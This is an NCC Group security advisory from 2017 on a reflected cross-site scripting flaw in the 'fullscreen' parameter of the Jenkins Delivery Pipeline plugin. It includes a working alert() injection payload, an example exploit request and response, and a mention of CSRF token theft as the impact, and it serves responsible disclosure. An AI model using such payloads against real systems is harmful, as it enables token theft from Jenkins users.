Verder naar navigatie Doorgaan naar hoofdinhoud Ga naar de voettekst

Technical Advisory: Reflected Cross-Site Scripting (XSS) vulnerability in Jenkins Delivery Pipeline plugin

Vendor: Jenkins Delivery Pipeline Plugin

Vendor URL: https://plugins.jenkins.io/delivery-pipeline-plugin

Versions affected: 1.0.7 (up to and including)

Systems Affected: Jenkins

Author: Viktor Gazdag viktor.gazdag[at]nccgroup[dot]trust

Advisory URL / CVE Identifier: https://jenkins.io/security/advisory/2017-11-16/

Risk: Medium – 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) (Reflected Cross-Site Scripting)

Summary

The Delivery Pipeline Plugin is a Jenkins plugin that helps visualizing the delivery/build pipelines. A parameter of the plugin is vulnerable to reflected cross-site scripting and depending on the configuration, can allow authenticated or unauthenticated attackers to inject JavaScript code into the webpage.

Location

The parameter called ‘fullscreen’ found in the Delivery Pipeline Plugin was found to be vulnerable.

Impact

The vulnerability allows authenticated or unauthenticated (depending on the configuration) attackers to inject JavaScript code, such as extraction and theft of the CSRF token called ‘crumb’ from the webpage.

Details

An example URL of the view is: http://hostname:8443/view/OMITTED-pipeline/?fullscreen=true
Basic code to show a popup window can be created with the following payload:

,1,1,false,null,30000,0,jsplumb);alert($(‘%23test’));pipelineutils.updatePipelines(pipelineContainers,%20″pipelineerror-“,%20+%20pipelineid,%20view<

The following GET request and response shows an example of how the vulnerability might be exploited:

GET /view/OMITTED-pipeline/?fullscreen=true,1,1,false,null,30000,0,jsplumb);alert($(‘%23test’));pipelineutils.updatePipelines(pipelineContainers,%20″pipelineerror-“,%20+%20pipelineid,%20view HTTP/1.1
Host: xxx.xxx.xxx.xxx:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: screenResolution=1920×1080; jenkins-timestamper-offset=-3600000; jenkins-timestamper=system; jenkins-timestamper-local=false; JSESSIONID.3dad5835=node0polduo6f03521qemnwxzxsuq71517.node0; screenResolution=1920×1080
Connection: close
Upgrade-Insecure-Requests: 1

The pipelineutils.updatePipelines() function in the response contains the submitted payload and will show a popup window:

HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Tue, 26 Sep 2017 16:51:28 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 15251
Connection: close
X-Content-Type-Options: nosniff
Expires: 0
Cache-Control: no-cache,no-store,must-revalidate
X-Hudson-Theme: default
X-Hudson: 1.395
X-Jenkins: 2.78
X-Jenkins-Session: e6f83b99
X-Frame-Options: sameorigin
X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkMubT4QgTWD1/LNMG5xdhX7n5Gzw4NmUubl6lS21l4EWkTZt3CDn8loWsgv++j4avamvNbzV6AvKqf9SPWnSjwRFk0ndm5B8rV2wrxFiQqxx83TGiQ3m0Xj8+PYBX7Vo6WgvQ7CSm/fbVK4Pn9OsVeacQffh6bROrKjW1hXP/ycEvsjKLGkLvxyrz65qe6rP9sjvjkxxRO1Dr+hbQS2PjyOS4rlpqL0pQWHfHlnxu415G4N3Iqwqt0aFu7iYtAgwa1GMO9OKwgNqGCcq2NoOg1FmLfTNC96uD0f+y+wz6kjz6aMg0jcMm4OaC6/39QdbXSWCLzrjj6zSfdIxU+oQfwIDAQAB
X-Content-Type-Options: nosniff
X-Frame-Options: DENY

…OMITTED DATA…

“>

Recommendation

Jenkins and the plugin developers have released a new version of the plugin which should be installed: https://repo.jenkins-ci.org/releases/se/diabol/jenkins/pipeline/delivery-pipeline-plugin/1.0.8/

Vendor Communication

2017-10-19 Advisory reported to Jenkins
2017-10-24 Acknowledgement of Core and Plugin developers
2017-11-16 Patch released

Thanks to

Gabor Pilsits

About NCC Group

NCC Group is a global expert in cyber security and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cyber security.

Written by: Viktor Gazdag